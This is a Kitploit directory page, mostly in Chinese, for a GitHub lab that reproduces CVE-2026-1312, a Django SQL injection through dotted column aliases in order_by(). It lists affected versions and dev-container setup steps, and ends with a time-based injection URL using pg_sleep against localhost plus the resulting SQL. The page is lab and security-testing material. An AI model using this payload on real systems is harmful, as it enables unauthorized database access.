Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1312 — Reproduces CVE-2026-1312, a Django SQL injection vulnerability, with a Dockerized environment and step-by-step PoC for security testing. | Kitploit
工具/GitHubGitHub/sw0rd1ight/cve-2026-1312
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

Reproduces CVE-2026-1312, a Django SQL injection vulnerability, with a Dockerized environment and step-by-step PoC for security testing.

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1312 是一个高危 Django SQL 注入漏洞:当 QuerySet.order_by() 中使用包含点号的列别名,并配合 FilteredRelation 通过字典展开动态构造查询时,可能被攻击者注入恶意 SQL

受影响版本:

  • Django 6.0分支中6.0.2之前的版本
  • Django 5.2分支中5.2.11之前的版本
  • Django 4.2分支中4.2.28之前的版本

环境启动

该漏洞项目使用vscode的devcontiner进行构建

1️⃣ 打开项目 用 VS Code 打开已经存在的项目根目录(包含 .devcontainer 文件夹)。

2️⃣ 重新打开容器(构建 Dev Container)

按 Ctrl+Shift+P(Windows/Linux)或 Cmd+Shift+P(Mac)

输入 Remote-Containers: Reopen in Container

VS Code 会读取 .devcontainer 配置并构建容器(首次构建可能需要几分钟)

⚠️ 如果 Dockerfile 或依赖更新过,可以选择 Remote-Containers: Rebuild Container,确保使用最新环境。

3️⃣ 运行 Django 开发服务器

打开命令面板 Ctrl+Shift+P

输入 Tasks: Run Task

选择 django:start(任务已在 .vscode/tasks.json 配置)

这个任务会在容器内启动 Django 开发服务器

默认监听 0.0.0.0:8086

4️⃣ 打开浏览器访问项目

打开浏览器访问:

http://localhost:8086

5️⃣ 注意事项

第一次运行:

可能需要执行数据库迁移:

root@kitploit:~
python manage.py migrate

漏洞复现

访问/book/search接口,http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

即可看到延时3秒成功

此时django orm底层编译出来的sql为

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
下载工具